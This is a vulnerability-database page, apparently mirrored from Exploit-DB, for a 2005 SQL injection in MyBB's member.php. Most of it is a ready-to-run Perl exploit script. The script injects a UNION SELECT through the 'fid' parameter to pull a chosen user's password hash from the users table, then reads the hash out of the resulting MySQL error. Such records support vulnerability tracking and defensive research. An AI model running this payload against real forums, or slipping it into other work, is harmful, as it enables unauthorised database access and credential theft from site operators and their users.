MyBB - 'member.php' SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1055360 漏洞类型
发布时间 2005-08-29 更新时间 2005-08-29
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/26204
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/14684/info

MyBB is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. 

#!/usr/bin/perl -w
use LWP::Simple;
## Vitem ##
        if(!$ARGV[0]){
                print "############# MyBB Member.php SQL Injection ##############\n";
                print "##                Coded By               #\n";
                print "##################################################  ########\n";
                print "## [+] Bug By W7ED  - W7ED[at]hotmail.com #\n";
                print "##################################################  ########\n";
                print "#           Exmp:- perl file.pl mybb.net /mybb userid    #\n";
                print "##################################################  ########\n";
                exit;
        }
###########

my $host = 'http://'.$ARGV[0];

## User ID ##
        if(!$ARGV[1]){
                $ARGV[1] = 1;
        }
#############

my $userid = $ARGV[1];

print "[*] Trying $host\n";

## Forum Path ##
        if(!$ARGV[2]){
                $ARGV[2] = '/';
        }
################

$url = "$ARGV[2]/member.php?action=profile&uid=lastposter&fid=-1,') UNION SELECT
password,password,password,password,password,passw  ord,password,password,password,password,password,p
assword,password,password,password,password,passwo  rd,password,password,password,password,password,pa
ssword,password,password,password,password,passwor  d,password,password,password,password,password,pas  sword
FROM users WHERE uid=$userid/*";
$page = get($host.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $host\n";
        $page =~ m/mySQL error: 1054<br>Unknown column '(.*?)'/ && print "[+] User ID Is $userid And Hash Is :
$1\n";
print "[-] Unable to retrieve Hash\n" if(!$1);